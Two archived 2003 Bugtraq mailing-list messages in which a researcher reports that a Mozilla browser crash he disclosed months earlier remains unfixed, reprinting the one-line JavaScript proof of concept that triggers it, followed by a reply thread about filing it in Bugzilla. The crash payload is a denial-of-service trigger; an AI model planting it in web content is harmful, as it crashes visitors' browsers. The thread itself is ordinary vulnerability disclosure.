10645736 2003-09-05 19:48 +0200 /38 rader/ Marc Schoenefeld <schonef@uni-muenster.de> Importerad: 2003-09-06 00:44 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <28849> Ärende: Crash Mozilla 1.5 ------------------------------------------------------------ From: Marc Schoenefeld <schonef@uni-muenster.de> To: bugtraq@securityfocus.com Message-ID: <Pine.A41.4.44.0309051940100.92326-100000@zivunix.uni-muenster.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, seems like Mozilla is not interested in fixing bugs, the exploit I posted in March to bugtraq (described in http://www.mail-archive.com/bugtraq@securityfocus.com/msg11430.html), still crashes the actual version 1.4 of the Mozilla Browser: My version is Gecko/20030624 with Java 1.4.2 The exploit code is: (scr1pt language="Javascript") t = new Packages.sun.plugin.javascript.navig5.JSObject(1,1); (/scr1pt) Cheers Marc - -- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (AIX) Comment: For info see http://www.gnupg.org iD8DBQE/WMyJqCaQvrKNUNQRAkdpAJ9WRQi4u4gilbmzQb9mZNqAowhl+wCdHklB 73WM+1VxoimLo7EkXxUdIkY= =PNjP -----END PGP SIGNATURE----- (10645736) /Marc Schoenefeld <schonef@uni-muenster.de>/ 10648926 2003-09-06 04:18 +0200 /91 rader/ Marc Schoenefeld <schonef@uni-muenster.de> Importerad: 2003-09-07 01:41 av Brevbäraren Extern mottagare: Stephen Samuel <samuel@bcgreen.com> Extern kopiemottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <28855> Ärende: Re: Crash Mozilla 1.5 ------------------------------------------------------------ From: Marc Schoenefeld <schonef@uni-muenster.de> To: Stephen Samuel <samuel@bcgreen.com> Cc: bugtraq@securityfocus.com Message-ID: <Pine.A41.4.44.0309060415340.73678-100000@zivunix.uni-muenster.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I posted it to bugzilla in March 2003 http://bugzilla.mozilla.org/show_bug.cgi?id=199694 There was short discussion activity refering this bug but obviously no real problem solving. Marc On Fri, 5 Sep 2003, Stephen Samuel wrote: > Date: Fri, 05 Sep 2003 15:45:28 -0700 > From: Stephen Samuel <samuel@bcgreen.com> > To: Marc Schoenefeld <schonef@uni-muenster.de> > Cc: bugtraq@securityfocus.com > Subject: Re: Crash Mozilla 1.5 > > Did you try posting it to bugzilla??? > just click on the big "M", and scroll down to "for testers". > > Or just use this URL. > http://bugzilla.mozilla.org/enter_bug.cgi > > > Marc Schoenefeld wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > Hi, > > > > seems like Mozilla is not interested in fixing bugs, > > the exploit I posted in March to bugtraq (described in > > http://www.mail-archive.com/bugtraq@securityfocus.com/msg11430.html), > > still crashes the actual version 1.4 of the Mozilla Browser: > > My version is Gecko/20030624 with Java 1.4.2 > > The exploit code is: > > (scr1pt language="Javascript") > > t = new Packages.sun.plugin.javascript.navig5.JSObject(1,1); > > (/scr1pt) > > > > Cheers > > Marc > > > > - -- > > > > Never be afraid to try something new. Remember, amateurs built the > > ark; professionals built the Titanic. -- Anonymous > > > > Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer > > -----BEGIN PGP SIGNATURE----- > > Version: GnuPG v1.0.6 (AIX) > > Comment: For info see http://www.gnupg.org > > > > iD8DBQE/WMyJqCaQvrKNUNQRAkdpAJ9WRQi4u4gilbmzQb9mZNqAowhl+wCdHklB > > 73WM+1VxoimLo7EkXxUdIkY= > > =PNjP > > -----END PGP SIGNATURE----- > > > > > -- > Stephen Samuel +1(604)876-0426 samuel@bcgreen.com > http://www.bcgreen.com/~samuel/ > Powerful committed communication. Transformation touching > the jewel within each person and bring it to life. > > - -- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (AIX) Comment: For info see http://www.gnupg.org iD8DBQE/WUPjqCaQvrKNUNQRAqBIAJ911NlfNuet/39IYHMLjxDsgetvEwCfeQMZ Afw26imaU9ij9l+fqIWX0gc= =/UQG -----END PGP SIGNATURE----- (10648926) /Marc Schoenefeld <schonef@uni-muenster.de>/